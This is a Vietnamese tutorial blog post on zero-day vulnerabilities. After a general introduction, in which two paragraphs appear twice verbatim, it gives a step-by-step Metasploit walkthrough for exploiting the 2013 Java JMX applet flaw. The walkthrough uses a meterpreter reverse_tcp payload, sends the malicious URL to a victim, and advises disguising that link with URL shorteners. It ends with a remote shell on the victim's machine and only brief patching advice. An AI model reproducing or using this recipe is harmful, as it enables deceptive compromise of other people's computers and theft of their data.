Lỗ hổng zero day là một thuật ngữ để chỉ những lỗ hổng chưa được công bố hoặc chưa được khắc phục.
Cách hack khai thác lỗ hỗng Zero Day, Hướng dẫn hack zero day, hacking o day, kỹ thuật hack zero day, kỹ thuật hack o day mới nhất
1. Giới thiệu chung về lỗ hổng Zero Day (0 day)
Lợi dụng những lỗ hổng này, hacker có thể xâm nhập được vào hệ thống máy tính của các doanh nghiệp, tập đoàn để đánh cắp hay thay đổi dữ liệu.
Hệ quả là có cả một thị trường chợ đen giao dịch, mua bán lỗ hổng Zero day hết sức đông vui, nhộn nhịp trên mạng Internet.
Tuổi thọ trung bình của một lỗ hổng zero day là 348 ngày trước khi nó được phát hiện ra hoặc vá lại, nhiều lỗ hổng thậm chí còn sống “thọ” hơn thế. Bọn tội phạm mạng sẵn sàng trả khoản tiền rất lớn để mua lại các lỗ hổng zero-day.
Còn tấn công “Zero Day”, theo Burleson Consulting, được định nghĩa như là một cuộc tấn công diễn ra trong một thời gian ngắn, thường chưa đến một ngày (do đó có thuật ngữ “zero day”). Cuộc tấn công zero day được đạo diễn cẩn thận để tối đa hóa thiệt hại trong một ngày bởi vì các công cụ diệt virus truyền thống (phần mềm vá) không có đủ thời gian để phản ứng.
Hệ quả là có cả một thị trường chợ đen giao dịch, mua bán lỗ hổng Zero day hết sức đông vui, nhộn nhịp trên mạng Internet.
Tuổi thọ trung bình của một lỗ hổng zero day là 348 ngày trước khi nó được phát hiện ra hoặc vá lại, nhiều lỗ hổng thậm chí còn sống “thọ” hơn thế. Bọn tội phạm mạng sẵn sàng trả khoản tiền rất lớn để mua lại các lỗ hổng zero-day.
Còn tấn công “Zero Day”, theo Burleson Consulting, được định nghĩa như là một cuộc tấn công diễn ra trong một thời gian ngắn, thường chưa đến một ngày (do đó có thuật ngữ “zero day”). Cuộc tấn công zero day được đạo diễn cẩn thận để tối đa hóa thiệt hại trong một ngày bởi vì các công cụ diệt virus truyền thống (phần mềm vá) không có đủ thời gian để phản ứng.
2. Hình thức tấn công Zero Day (0 day)
Lỗ hổng “Zero day” này lạm dụng các lớp JMX từ một Applet Java để chạy mã Java tùy ý bên ngoài sandbox và được khai thác vào tháng 1 năm 2013. Lỗ hổng này ảnh hưởng đến phiên bản Java 7u10 và trước đó.
Hình thức tấn công này là cho phép khai thác lỗ hổng java trên máy của victim hoặc gọi là tấn công Client Side. Mô phỏng như sau:
- Attacker tạo ra website. Trên website chạy đoạn mã khai thác lỗi java cho phép thực thi lệnh nguy hiểm.
- Victim duyệt website của attacker bị thực thi mã nguy hiểm inject code vào hệ thống.
- Attacker khai thác thông tin trên máy của nạn nhân.
3. Pentesting – Khai thác lỗ hổng Zero Day (0 day)
Các bước thực hiện như sau:Bước 1: Mở terminal lên và khởi động metasploit framework bằng cách gõ: msfconsole
Bước 2: Sử dụng module exploit/multi/browser/java_jre17_jmxbean của metasploit framework
Bước 3: Cấu hình các tham số:
payload java/meterpreter/reverse_tcp
lhost <IP_của_bạn>
Bước 4: Exploit và sao chép url website đó gửi cho nạn nhân
Ở trên ta thấy URL: http://10.0.0.131:8080/vXdjaGu ==> Chính là URL ta cần gửi đi. Chúng ta sẽ gửi qua máy nạn nhân theo url này. Nếu muốn khéo léo che đậy url trên bạn có thể dùng các dịch vụ rút gọn link như : tinyurl, goo.gl,… để đường link của mình để thuyết phục người dùng nhấp vào.
Bước 5: Chờ nạn nhân duyệt website:
Bước 6: Kiểm tra trên Metasploit Framework sẽ thấy có kết nối tới máy nạn nhân như thế này:
Meterpreter đang chờ ở session2. Để kết nối chúng ta sử dủng command : session -i 2
Vậy là chúng ta đã có meterpreter command-line phần còn lại tôi để dành cho các bạn tự tìm hiểu. Lỗ hổng java là một trong những lỗ hổng đặc biệt nghiêm trọng chính vì vậy để phòng chống lỗ hổng này chúng ta nên:
- Update bản java mới nhất
- Không chấp nhập chạy java trên các trang web không tin tưởng.
Qua bài lab này các bạn đã có cái nhìn tổng quan về việc tấn công các máy tính thông qua lỗ hổng bảo mật nghiêm trọng của zero day (không ngày). Bài viết này chỉ mang mục đích học tập.
Bài học này dựa trên bài của thầy Vũ Quý Hòa
Khai thác lỗ hổng Zero Day (0 day)
4/
5
Oleh
Unknown